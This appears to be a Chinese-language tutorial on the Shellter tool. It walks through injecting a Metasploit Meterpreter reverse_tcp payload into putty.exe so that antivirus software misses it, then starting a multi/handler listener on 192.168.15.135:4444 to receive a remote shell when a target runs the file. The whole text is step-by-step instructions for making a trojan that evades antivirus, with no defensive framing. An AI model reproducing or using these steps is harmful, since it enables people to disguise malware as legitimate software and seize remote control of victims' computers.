Shellter-A Shellcode 注入工具

Shellter 是一个 shellcode 注入工具。它有效地重新编码有效负载（此处为外壳代码）以绕过防病毒（AV）软件。Shellter已被证明是Windows 32位应用程序的PE（可移植可执行文件）文件格式的第一个动态感染者。要使用Shellter，您可以创建自己的shellcode，也可以从Metasploit等框架中创建一个shellcode。Shellter 嵌入了一个 32 位 Windows 应用程序和 shellcode。

安装

在kali Linux中我们可以利用下面命令直接安装

apt-get install shellter

接下来，我们需要安装wine32环境。

apt-get intall wine32

运行Shellter

在终端执行命令Shellter
Shellter时，它会提示您选择操作模式。

选择模式为a。

现在，您需要选择一个可执行文件并将其复制到Shellter文件夹。要将 Shellter 与.exe文件绑定，需要执行此操作。在这里我们以putty.exe为列。

当系统要求您输入 PE 目标时，请键入以下命令：

/root/Downloads/putty.exe

在经过一番复杂的编码加密注入后，下面要求我们选择一种 payload 或 自定义使用 payload ，这里我选择 L 并选择列表中的 1 ：

set LHOST ：192.168.15.135
set LPORT ：4444

当我们回车后，shellter 就会自动帮我们生成 shellcode 并自动退出程序。我们在当前目录下 使用 ls -l 命令进行查看，可以看到 putty.exe 已被成功注入：
接着我们在 kali 上启动 MSF，配置反弹会话的 handler ：

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.135
set port 4444
exploit

此时只要当目标成功运行，经我们注入的 shellcode 程序，我们就能取得目标的 shell ！